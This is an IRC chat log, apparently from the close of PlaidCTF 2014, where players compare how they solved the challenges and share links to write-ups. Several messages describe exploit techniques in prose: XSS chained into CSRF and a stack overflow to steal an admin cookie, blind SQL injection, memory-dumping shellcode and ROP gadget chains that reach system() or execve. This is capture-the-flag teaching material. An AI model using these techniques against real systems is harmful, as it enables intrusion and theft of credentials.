  11197. (17:07:40) (_blasty_) I wanna refine some stuff in the AM
  11198. (17:07:41) ••• pArt: (acez) ([email protected])
  11199. (17:07:45) (_blasty_) not fucking now, though
  11200. (17:07:48) (+tylerni7) plaintext: most of us have control of it
  11201. (17:07:58) (deject3d) anyone have strategies on solving brony? i don't really understand how attacking the internal target was supposed to work
  11202. (17:08:05) (inter) brony?
  11203. (17:08:09) (_blasty_) deject3d: XSS
  11204. (17:08:10) (inter) i know 2nd part
  11205. (17:08:14) (inter) deals with shit ton of stuff
  11206. (17:08:24) (robbje) sven: xor. ...
  11207. (17:08:29) (deject3d) yeah but the xss wasn't the attack on the actual target
  11208. (17:08:34) (foundation) btw, about brony, what was the first part, i did get the PHPSESSIONID , what then ?
  11209. (17:08:41) (dwn) _blasty_: the fuck did you use xss to do though
  11210. (17:08:42) (deject3d) i want to know how we were supposed to use the xss to attack the internal panel
  11211. (17:08:49) (_blasty_) deject3d: so using the XSS in the ponies website you can execute a CSRF POST against the login form of the portal page
  11212. (17:08:57) (nurfed_) xss->csrf->expolt leak->xss->csrf->exploit->/bin/bash
  11213. (17:08:59) (_blasty_) if you feed the portal page more than N chars in the OTP field it will segfault
  11214. (17:09:08) (_blasty_) if you keep feeding it chars it will trigger the "stack smashing detected" message
  11215. (17:09:18) (_blasty_) the "stack smashing detected" message has the progname in it
  11216. (17:09:19) (foundation) ooooo....
  11217. (17:09:21) (foundation) niceeee
  11218. (17:09:26) (_blasty_) like STACK SMASHING DETECTED: ./checkotp terminated
  11219. (17:09:40) (deject3d) what is the point of the csrf? we could already see the 'internal' login page, right? or am i misinformed
  11220. (17:09:43) (dwn) _blasty_: what values did you post to the login form though?
  11221. (17:09:43) (_blasty_) but the pointer to that argv0 checkotp string could be overwritten
  11222. (17:09:52) (_blasty_) so get your own input in the output again
  11223. (17:10:01) (_blasty_) then you basically elevevate XSS privileges to that domain
  11224. (17:10:09) ••• qUit: (albntomat0) (8c201003@gateway/web/freenode/ip.140.32.16.3) Quit: Page closed
  11225. (17:10:10) (_blasty_) from where you can leak the admin cookie
  11226. (17:10:19) (_blasty_) we'll do a proper writeup
  11227. (17:10:22) (phiber) dwn, Adran https://privatepaste.com/6413fc0aca
  11228. (17:10:24) (_blasty_) this explanation sucks
  11229. (17:10:26) (_blasty_) part#2 is even cooler
  11230. (17:10:27) (deject3d) would appreciate it
  11231. (17:10:46) (deject3d) i tried using beef framework to start some attacks against the internal site but owell
  11232. (17:10:52) (inter) well
  11233. (17:10:52) (dwn) wow, you actually wrote your own dns server phiber. amazing.
  11234. (17:11:00) (inter) now i can go do my kush
  11235. (17:11:04) (inter) happily
  11236. (17:11:05) (inter) lul
  11237. (17:11:12) (_blasty_) I also "wrote" my "own" DNS server for whatscat, using some perl module :-P
  11238. (17:11:18) (inter) now that i figured out the stuff that i couldnt do :D
  11239. (17:11:23) (_blasty_) Net::DNS::Server or something
  11240. (17:11:24) (_blasty_) yay perl.
  11241. (17:11:36) ••• qUit: (Guest75992) (80edcf34@gateway/web/freenode/ip.128.237.207.52) Ping timeout: 240 seconds
  11242. (17:11:39) (plaintext) we did whatscat with blind sqli
  11243. (17:11:42) (+tylerni7) dinner time for PPP
  11244. (17:11:50) (+tylerni7) we'll be back online laterz
  11245. (17:11:52) (_blasty_) we did whatscat by updating the email field in the DB
  11246. (17:11:58) ••• qUit: (xire_) ([email protected]) Quit: Lost terminal
  11247. (17:11:59) (plaintext) tylerni7, I sent you a message :)
  11248. (17:12:01) (Adran) phiber: ugh, inject was dns
  11249. (17:12:06) (dwn) how did you all do tenement?
  11250. (17:12:07) (_blasty_) then requesting the reset page again for that user to leak back the value we inserted into the email field
  11251. (17:12:07) (Adran) didn't think about that. thanks
  11252. (17:12:19) ••• qUit: (mrsmith67) (uid11196@gateway/web/irccloud.com/x-wrpmyrgkuuglgdje) Quit: Connection closed for inactivity
  11253. (17:12:20) (dwn) it was 100pts so it must've been incredibly easy
  11254. (17:12:24) (dwn) but the seccomp
  11255. (17:12:46) (foundation) dwn: no need for the shell, just egghunt for PPPP in memory
  11256. (17:12:52) (+pctf_scoreboard) o/
  11257. (17:12:55) ••• qUit: (pctf_scoreboard) ([email protected]) Quit: WeeChat 0.3.8
  11258. (17:12:57) ••• qUit: (shabgrd) (~mostafa@unaffiliated/shabgard) Ping timeout: 245 seconds
  11259. (17:13:04) (Adran) the scoreboard is speaking!
  11260. (17:13:10) (dwn) was PPPP in a static location
  11261. (17:13:32) (foundation) dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
  11262. (17:13:40) (dwn) oh, neat
  11263. (17:13:44) (dwn) thanks will remember that
  11264. (17:13:50) (foundation) it was in some mmaped region , but we didn't know where
  11265. (17:14:05) (deject3d) was there a trick to solving polygonshifter web100
  11266. (17:14:13) (plaintext) just blind sqli
  11267. (17:14:19) (plaintext) nothing extra
  11268. (17:14:21) (foundation) afaik bsqli
  11269. (17:14:24) (deject3d) wait, it was a sqli
  11270. (17:14:26) (deject3d) oh god damnit
  11271. (17:14:35) (plaintext) i guess I will make quick a writeup on that too
  11272. (17:14:39) (Tapyroe__) !! -.-
  11273. (17:14:49) (pd7) plaintext: are your writeups online yet?
  11274. (17:14:59) (plaintext) pd7: i made one on halphow2js
  11275. (17:15:01) (Tapyroe__) sitting here thinking about all the problems i could've solved haha....
  11276. (17:15:17) (dwn) was there some neat way to evaluate all the templates in G++ for you
  11277. (17:15:18) (nurfed_) web100 was stupid :/
  11278. (17:15:18) (geobot) on web100 chicken
  11279. (17:15:22) (Tapyroe__) or rather, should've been able to solve haah
  11280. (17:15:28) (dwn) because we just worked G++ out on paper
  11281. (17:15:29) (D3AdCa7_) Is polygonshifter can be solved by union way?
  11282. (17:15:30) (plaintext) plaid retweeted it but I removed that tweet dammit, because there was a typo :P
  11283. (17:15:32) (deject3d) i took the problem description at face value and tried to actually brute force the login
  11284. (17:15:44) (plaintext) and now it's not retweeted, no fame :(
  11285. (17:15:50) (D3AdCa7_) My bsqli script runs so slow
  11286. (17:16:08) (foundation) dwn: apparentlly you needed to figure out that it's actually just doing matrix multiplication over galois field 257 ...
  11287. (17:16:12) (pcc7) a writeup for pyjail?.
  11288. (17:16:27) (deject3d) the html comment "admin / ???????" made me think it was actually a 7 char password. "polygon" and "shifter" are both 7 chars each, so i wrote a script to try every combination involving case
  11289. (17:16:37) (deject3d) WHAT A WASTE
  11290. (17:16:43) ••• jOin: (Stean) ([email protected])
  11291. (17:17:07) (D3AdCa7_) u r so cute.. deject3d :)
  11292. (17:17:20) (plaintext) it wasn't misc 10 though :P
  11293. (17:17:37) (iZsh) how did you guys solve tenement? because it took me forever and some ppl solved it quickly, so i'm wondering if i missed an easier way
  11294. (17:17:49) (dwn) plaintext: link to your how2js writeup?
  11295. (17:18:02) (dwn) iZsh: 18:14 < foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
  11296. (17:18:17) (cimmi_) what was actually the answear to the math is hard?
  11297. (17:18:24) (plaintext) http://balidani.blogspot.pt/2014/04/plaidctf-halphow2js-writeup.html
  11298. (17:18:28) (mathiasbynens) plaintext: in your how2js writeup, “The keys cannot be in increasing order” → wut?
  11299. (17:18:38) (plaintext) mathiasbynens: is that a mistake?
  11300. (17:18:42) (plaintext) let me check
  11301. (17:18:49) (foundation) iZsh: took a while to figure out how not to segfault on invalid pages
  11302. (17:18:57) (plaintext) oh right, lol
  11303. (17:18:58) (plaintext) i'm dumb
  11304. (17:19:02) (D3AdCa7_) a script for web100 https://gist.github.com/D3AdCa7/10604720
  11305. (17:19:03) (foundation) cimmi_: 100000
  11306. (17:19:03) (plaintext) I'll add a clarification
  11307. (17:19:16) ••• jOin: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126)
  11308. (17:19:19) (mathiasbynens) plaintext: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme they’re sorted lexicographically
  11309. (17:19:20) (iZsh) dwn: what did you write? i'm not sure i follow, but i dont remember exactly the whole thing :)
  11310. (17:19:24) (mathiasbynens) but you knew that
  11311. (17:19:32) (foundation) cimmi_: google excel 65000 100000 for clarification
  11312. (17:19:34) (plaintext) yeah, brainfart
  11313. (17:19:40) (mathiasbynens) plaintext: i'll add a link to your write-up, let me know if you write more!
  11314. (17:19:41) ••• jOin: (naehrwert) ([email protected])
  11315. (17:19:47) (plaintext) thanks :)
  11316. (17:19:51) (plaintext) I'll do one on polygon I guess
  11317. (17:19:58) (cimmi_) yea I actually did read it when I tried to find the answear
  11318. (17:20:07) (dwn) iZsh: tenement basically just executed your buffer but there was seccomp so you're not going to read the file or get shell. I wasn't able to get around this because I couldn't figure out how to find the flag in memory. foundation just dumped the whole memory.
  11319. (17:20:20) (skuu) plaintext: did you mention hudak? if so; remember the flag so I can check where I went wrong?
  11320. (17:20:30) (iZsh) dwn: we solved it completely differently, we called malloc(16) and had some smart filtering to recognize the proper pointers to follow
  11321. (17:20:33) (cimmi_) I submitted 10k and not 100k when looking at that one. stupid
  11322. (17:20:44) (|x_x|) http://csrc.tamuc.edu/css/?p=156 Lazy man's doge_stege writeup
  11323. (17:20:46) (foundation) iZsh: we just wrote egghunt shellcode that traversed the memory , the trick was to see which addresses were actually mapped , using write() you can check if the address is valid or not
  11324. (17:20:55) (plaintext) i think I have the hudak flag
  11325. (17:21:07) (iZsh) foundation: oh i see
  11326. (17:21:11) (plaintext) skuu: 4t_l34st_it_was_1mperat1v3...
  11327. (17:21:17) (skuu) oh wow, thanks
  11328. (17:21:17) (iZsh) well, we did it the complicated way ;-)
  11329. (17:21:17) (|x_x|) http://csrc.tamuc.edu/css/?p=152 Sanity Check, Heartbleed, and Multiplication is Hard as well. ya know, in case ya had problems with Sanity Check.
  11330. (17:21:23) (skuu) soo close
  11331. (17:21:31) (abuss) cimmi_, ouch; why wouldn't you just submit 100000? :P
  11332. (17:21:36) ••• qUit: (zzoru) (6e23254c@gateway/web/freenode/ip.110.35.37.76) Ping timeout: 240 seconds
  11333. (17:21:46) (abuss) sanity check was a really hard web problem
  11334. (17:21:47) ••• jOin: (zzoru) (6e23254b@gateway/web/freenode/ip.110.35.37.75)
  11335. (17:21:53) (iZsh) foundation, dwn : So libjansson has a reference-count based object system, and when a successful address has been found from the json array, it free()'s both the json integer object and the json array containing the same integer, so when dumping all the free()'d objects (by malloc'ing 16 bytes and dumping the contents), you'll see the reference count of 0 for a lot of objects, and reference count -1 for the chosen address.
  11336. (17:21:53) (iZsh) Then &0xfffff000 it and dump the buffer, and you get the flag;
  11337. (17:22:01) ••• qUit: (deject3d) ([email protected]) Quit: Computer has gone to sleep.
  11338. (17:22:03) (abuss) <f5><f5><f5><f5><f5> ooh a flag - submit? no it timed out <f5> <f5> <f5> <f5> <f5>
  11339. (17:22:19) (cimmi_) abuss: who knows? atleast not me
  11340. (17:22:19) (abuss) "Logged in as Samurai, abort!"
  11341. (17:22:19) (dwn) nice iZsh
  11342. (17:22:34) (iZsh) the write() trick is nice :)
  11343. (17:22:38) (iZsh) much easier
  11344. (17:22:41) (spq) admins: what was wrong with the scoreboard being unreachable from some places in the first hours?
  11345. (17:22:46) (iZsh) i spent hours and hours no tenement
  11346. (17:22:54) (dwn) yeah for only 100pts
  11347. (17:23:02) (dwn) ;_;
  11348. (17:23:08) (iZsh) i wonder how we were supposed to solve it
  11349. (17:23:16) (iZsh) if they expected 100pt
  11350. (17:23:16) (geobot) only 100pt for a bit, or a school/work day - in pm about rarverseme?
  11351. (17:23:36) (iZsh) tylerni7: what was the expected way?
  11352. (17:23:43) (mathiasbynens) iZsh: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/tenement#readme dump the whole memory then run strings
  11353. (17:23:59) ••• qUit: (Mawekl) ([email protected]) Quit: lulu
  11354. (17:24:10) ••• jOin: (irctc035) (4406454f@gateway/web/freenode/ip.68.6.69.79)
  11355. (17:24:17) (dwn) all these todo writeups mathiasbynens, lol
  11356. (17:24:23) (iZsh) mathiasbynens: lol
  11357. (17:24:40) (iZsh) mathiasbynens: that could be summarized as "get the flag"
  11358. (17:25:09) (mathiasbynens) dwn: yeah the point is for people to help ;)
  11359. (17:25:23) (mathiasbynens) iZsh: inorite
  11360. (17:25:52) ••• jOin: (DeAdCaT___) ([email protected])
  11361. (17:25:52) ••• qUit: (DeAdCaT___) ([email protected]) Client Quit
  11362. (17:26:17) ••• qUit: (D3AdCa7_) (d220a27e@gateway/web/freenode/ip.210.32.162.126) Quit: Page closed
  11363. (17:26:23) ••• qUit: (inter) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Would you like to know more?
  11364. (17:27:07) ••• qUit: (irctc035) (4406454f@gateway/web/freenode/ip.68.6.69.79) Client Quit
  11365. (17:27:48) (dwn) this hash length extension thing is the most obscure web thing ever. i love it
  11366. (17:29:01) (dwn) ppp: will the challenge sources be released? or some way for us to run them ourselves to try to complete them?
  11367. (17:29:07) (iZsh) well hash length extension is a classic
  11368. (17:29:21) (dwn) is it? I've been ctfing for about a year and don't remember seeing it
  11369. (17:29:40) ••• jOin: (handlr) (~handlr@unaffiliated/handlr)
  11370. (17:29:51) (iZsh) it's not the first time i see one, but can't recall where
  11371. (17:29:53) ••• qUit: (nonroot) ([email protected]) Ping timeout: 276 seconds
  11372. (17:29:55) ••• qUit: (sweet_potatoes) ([email protected]) Ping timeout: 252 seconds
  11373. (17:30:13) (upb) yeah but how the hell was it supposed to be guessed that the serialized string is reversed before hashing?
  11374. (17:30:23) (iZsh) anyway, i'm off
  11375. (17:30:50) (phiber) upb, get admin.php source
  11376. (17:31:08) (|x_x|) Which could be obtained by feeding admin.php through the ?page= variable.
  11377. (17:31:20) ••• qUit: (ijonas) (534e453a@gateway/web/freenode/ip.83.78.69.58) Quit: Page closed
  11378. (17:31:50) ••• qUit: (nonconstant) (c1e17dfd@gateway/web/freenode/ip.193.225.125.253) Quit: Page closed
  11379. (17:32:36) (Digihash) Goodbye, thank you guys for the great CTF
  11380. (17:32:45) (dwn) upb: you could get the source
  11381. (17:32:46) (grollicus_) did you ever sql inject via dns records? that challenge was especially funny because there seems to be some vuln in the management software of the first domain we tried to use
  11382. (17:32:50) ••• qUit: (corpille) ([email protected]) Quit: Lost terminal
  11383. (17:32:55) ••• qUit: (c1l0) ([email protected]) Ping timeout: 245 seconds
  11384. (17:33:04) (dwn) grollicus_: I actually encountered the same thing
  11385. (17:33:05) (upb) HAH
  11386. (17:33:10) (dwn) reported it
  11387. (17:33:12) (phiber) I could have solved parlor in time if python/pypy wasn't so slow
  11388. (17:33:18) (poppopret) http://conceptofproof.wordpress.com/2014/04/13/plaidctf-2014-web-150-mtgox-writeup/
  11389. (17:33:25) (poppopret) my mtgox web 150 writeup
  11390. (17:33:41) (spq) how did you solve harry potter?
  11391. (17:33:41) (phiber) tylerni7, you could have given more bits of the md5 :/
  11392. (17:34:09) (sven) or you could've written your brute forcer in c :P
  11393. (17:34:10) (chuckleberry) huh, of all of the challenges most people think mtgox needed a writeup?
  11394. (17:34:22) (phiber) I didn't have enough time for that
  11395. (17:34:47) (phiber) there were like 10min left when I had the attack implemented
  11396. (17:34:58) (chuckleberry) life's hard
  11397. (17:35:17) ••• qUit: (Digihash) ([email protected]) Quit: Leaving
  11398. (17:35:23) (sven) we ran out of time to solve moscow too - it happens :)
  11399. (17:35:27) (foundation) 4st _l34t t1mpera _wa _it_ at_ as_1v3... << damn , so close
  11400. (17:35:37) (chuckleberry) poppopret: i didn't even get a mention!
  11401. (17:36:01) (chuckleberry) bad form
  11402. (17:36:01) (poppopret) huh?
  11403. (17:36:08) (chuckleberry) remember, you pmd me
  11404. (17:36:10) (spq) regarding harry potter: i really had problems finding gadgets, made it with very weird add [rbx-something], cl; cl was horrible to control - when i had that, i patched one got entry to point to system and the did a dereferencing call to that entry
  11405. (17:36:11) (chuckleberry) asked me for help...
  11406. (17:36:39) (poppopret) ok how would you like to be credited :)
  11407. (17:36:43) (foundation) spq: same here afaik
  11408. (17:36:47) (chuckleberry) i was joking
  11409. (17:36:52) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 258 seconds
  11410. (17:37:21) (poppopret) hahah ok
  11411. (17:37:36) (spq) foundation: how did you control cl? the add cl, cl + dec cl ?
  11412. (17:38:20) (naehrwert) spq, writing byte by byte using mov [rax], bl @ 401798
  11413. (17:38:21) ••• qUit: (Redford) ([email protected]) Ping timeout: 245 seconds
  11414. (17:38:52) (spq) naehrwert: well i had writing byte by byte working but didnt know what to do
  11415. (17:38:58) (skuu) spq: foundation: we didn't use system(), we used vsyscalls execve
  11416. (17:39:01) (plaintext) how did you guys solve sass btw?
  11417. (17:39:12) (plaintext) we thought about jumping to read to cause one more buffer overflow, but it was too late
  11418. (17:39:14) (_blasty_) hey naehrwert , you were also playing ?
  11419. (17:39:20) (spq) skuu: which vsyscalls?
  11420. (17:39:31) (spq) the stuff in 0xfffff... ?
  11421. (17:39:35) (skuu) yep
  11422. (17:39:39) (spq) damn
  11423. (17:39:40) (naehrwert) hi _blasty_ :) yup with skuu and foundation and some other nice guys
  11424. (17:39:46) (_blasty_) cool :)
  11425. (17:39:50) (_blasty_) what team? Binary bandits?
  11426. (17:39:56) (naehrwert) gn00bz
  11427. (17:39:59) (_blasty_) ah, right
  11428. (17:40:21) (spq) tried that, didnt work on my machine, detected unaligned jump into the page
  11429. (17:40:37) (skuu) yup, ubunutu and what not catches it
  11430. (17:40:38) ••• jOin: (KTlog) ([email protected])
  11431. (17:40:39) (skuu) but works on debian :D
  11432. (17:40:43) (spq) damn
  11433. (17:40:44) (skuu) 3.2 kernel ish
  11434. (17:40:54) (spq) that would have meant 1-2hrs less :)
  11435. (17:40:58) ••• jOin: (KT__) ([email protected])
  11436. (17:41:45) (spq) but was interesting how one can control a register with such obscure gadgets :)
  11437. (17:42:01) ••• qUit: (KTlog_) ([email protected]) Ping timeout: 252 seconds
  11438. (17:42:07) ••• qUit: (KT) ([email protected]) Ping timeout: 252 seconds
  11439. (17:42:49) ••• jOin: (sweet_potatoes) ([email protected])
  11440. (17:43:35) (plaintext) anyone who solved sass?
  11441. (17:44:14) ••• jOin: (batzig) ([email protected])
  11442. (17:44:17) ••• jOin: (chunderstruck) ([email protected])
  11443. (17:44:36) (naehrwert) so for parlor, is that '+' meant as concat. or addition?
  11444. (17:45:02) (phiber) haha
  11445. (17:45:29) (Galactic) dwn: RuCTF had a hash length extension attack.
  11446. (17:45:30) (naehrwert) I tried like every possible combo but could never reproduce server output -.-
  11447. (17:45:55) (phiber) I also got stuck there and had to ask about it
  11448. (17:46:13) ••• qUit: (braoru) ([email protected]) Quit: braoru
  11449. (17:46:17) (sven) int(md5(servernonce.decode("hex") + clientnonce + "\n").hexdigest(), 0x10)
  11450. (17:46:24) (alexwebr) Read all the scrollback, didn't see TL;DR for freya. Looked like MS-KKDPC, said FTS after reading krb5 ASN.1 from RFC. Anybody get it?
  11451. (17:46:33) (sven) i got it
  11452. (17:46:38) (sven) it was annoying as fuck :)
  11453. (17:46:48) (naehrwert) I'm pretty sure that was one way I tried it too, hmm :D
  11454. (17:47:09) (sven) alexwebr: you need to grab the http branch from https://github.com/nalind/krb5/compare/http
  11455. (17:47:36) (sven) and then change around /etc/krb5.conf until you can finally kinit ppp and then ssh [email protected]
  11456. (17:48:09) (alexwebr) sven: cool, and "shellpls" was actually the password?
  11457. (17:48:16) (sven) for the kerberos login, yeah
  11458. (17:48:22) (sven) (the kinit ppp part)
  11459. (17:48:51) ••• qUit: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126) Quit: Page closed
  11460. (17:49:24) (alexwebr) sven: Cool. I was expecting I'd have to write a proxy thing myself. Cool that there's code already. Thanks :-)
  11461. (17:49:42) (sven) yeah, i started writing my own proxy when i googled for some magic constant and found that git :-)
  11462. (17:50:01) ••• pArt: (Kasalehlia) ([email protected]) "(V) ( ;,,,; ) (V) Why not Zoidberg?"
  11463. (17:50:05) (sven) when i saw frozencemetery was the author of that patch i knew i was looking in the right direction ;)
  11464. (17:50:15) (alexwebr) Haha
  11465. (17:50:24) (sven) and then i failed for 3 hours because ssh was linked against some wrong version of the library \o/
  11466. (17:52:57) ••• pArt: (d248) ([email protected])
  11467. (17:53:14) (|x_x|) http://csrc.tamuc.edu/css/?p=169 Twenty Writeup
  11468. (17:58:44) ••• nIck: (64MAAAC71) is now known as (kaliman)
  11469. (17:58:59) ••• qUit: (jablonskim) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Po-ta-to, boil em, mash em, stick em in a stew.
  11470. (17:59:05) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  11471. (17:59:14) (cimmi_) any parlor writeups?
  11472. (17:59:36) ••• qUit: (ZadYree) ([email protected]) Ping timeout: 245 seconds
  11473. (18:00:24) ••• jOin: (deject3d) ([email protected])
  11474. (18:01:06) ••• qUit: (jmgrosen) ([email protected]) Quit: jmgrosen
  11475. (18:02:54) ••• qUit: (DeadheadTn) ([email protected]) Quit: Leaving
  11476. (18:04:16) (plaintext) i guess everyone is sleeping right now
  11477. (18:04:45) ••• qUit: (DuM) ([email protected]) Ping timeout: 252 seconds
  11478. (18:05:13) (|x_x|) Sleeping or realizing they just spent a weekend eating cold pizza and hacking instead of doing Calculus III homework that is due tomorrow.
  11479. (18:05:34) (plaintext) lol I do have an assignment due tomorrow
  11480. (18:05:42) (plaintext) crap
  11481. (18:05:59) (rray) assignment + essay ;_;
  11482. (18:08:34) (tokki) fak i wanted to log the whole channel
  11483. (18:08:40) (tokki) but this webirc killed it
  11484. (18:09:14) ••• qUit: (batzig) ([email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
  11485. (18:09:16) (tokki) any angel who wants to past it on pastebin <3
  11486. (18:09:19) (deject3d) i get to learn haskell tonight, yay procrastination
  11487. (18:09:51) (plaintext) deject3d: did you solve hudak?
  11488. (18:09:57) (chuckleberry) i need to learn why i'm so fucking bad at ctfs and how to fix that
  11489. (18:10:10) (deject3d) no, but i just went through my professors slides and literally saw the hudak name
  11490. (18:10:20) (deject3d) and was like "oh must have been a haskell challenge"
  11491. (18:10:29) (plaintext) well it was, kinda, sorta
  11492. (18:10:43) ••• jOin: (chrissing) ([email protected])
  11493. (18:11:07) (dwn) |x_x|: due tomorrow? wow, how nice. mine is midnight tonight ;_;
  11494. (18:11:27) (plaintext) dwn: what timezone?
  11495. (18:11:36) (Adran) tokki: sure
  11496. (18:11:45) ••• qUit: (poppopret) ([email protected]) Ping timeout: 258 seconds
  11497. (18:11:54) (dwn) plaintext: EST
  11498. (18:12:01) (|x_x|) dwn: Mine is due at noon tomorrow.
  11499. (18:12:25) (dwn) just need to pwn this submission server and i'll be set